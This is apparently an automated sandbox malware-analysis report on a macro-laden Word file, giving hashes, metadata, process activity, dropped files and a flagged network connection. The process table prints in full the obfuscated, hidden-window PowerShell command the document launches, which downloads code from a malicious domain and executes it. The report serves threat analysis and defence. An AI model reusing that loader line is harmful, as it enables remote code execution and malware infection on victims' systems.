analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IT23093854399388501149836.doc

Full analysis: https://app.any.run/tasks/512e4ed2-3c45-40e4-b0fe-25f6cb14a967
Verdict: Malicious activity
Analysis date: October 09, 2019, 14:14:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Wed Sep 25 23:02:00 2019, Last Saved Time/Date: Mon Sep 30 19:06:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

5CA6213B3814B6C5CB389D6C1466C338

SHA1:

5CB608A39325AB3831577D32EDA51617BA796D36

SHA256:

259666C12243E3357681855E670D41120AFBEFAEF613C8B2ECD2D747409369AC

SSDEEP:

768:qC3hskfJyrnl5SuxelIylxLPHJ2DvhZImJhHi/o5Zbtxw+tFNIBWVDUn:qC3hskRSSuclIyTPHkDD+WZbtxrt0p

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2908)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2908)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2092)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2908)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:09:30 18:06:00
CreateDate: 2019:09:25 22:02:00
TotalEditTime: 3.0 minutes
Software: Microsoft Office Word
RevisionNumber: 4
LastModifiedBy: Administrator
Template: Normal.dotm
Comments: -
Keywords: -
Author: Administrator
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2908"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IT23093854399388501149836.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2092"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$cihh=''; 36,97,61,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,39,104,116,116,112,58,47,47,104,111,109,101,46,104,111,112,101,100,97,121,98,111,111,107,46,99,111,109,47,63,110,101,101,100,61,57,102,53,98,57,101,101,38,118,105,100,61,100,112,101,99,49,38,53,51,48,50,39,41,59,105,101,120,32,36,97,59|%{$jdxea=a($_);$cihh+=$jdxea};iex $cihh;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 330
Read events
918
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4DA0.tmp.cvr
MD5:
SHA256:
2092powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JBM2HKSGOPFXGD3YTW2I.temp
MD5:
SHA256:
2092powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:C911F7DBBF8956A476A7162FD7A88B15
SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
2092powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF115793.TMPbinary
MD5:C911F7DBBF8956A476A7162FD7A88B15
SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
2908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:24290F9ADF3BFEDF4B75DE5382C48A27
SHA256:C170189F91CDF554D0451E04F18860790B1FFA50A07AA4FC8C1DB7E357005E5F
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$23093854399388501149836.docpgc
MD5:F49AB481040BFA5044D7A40417EE048F
SHA256:AAA3487653DBC403BC7BA3AC0F9DC32464DBA563EE1BEF4A67F5D31BC600D060
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2092
powershell.exe
185.189.149.169:80
home.hopedaybook.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
home.hopedaybook.com
  • 185.189.149.169
malicious

Threats

No threats detected
No debug info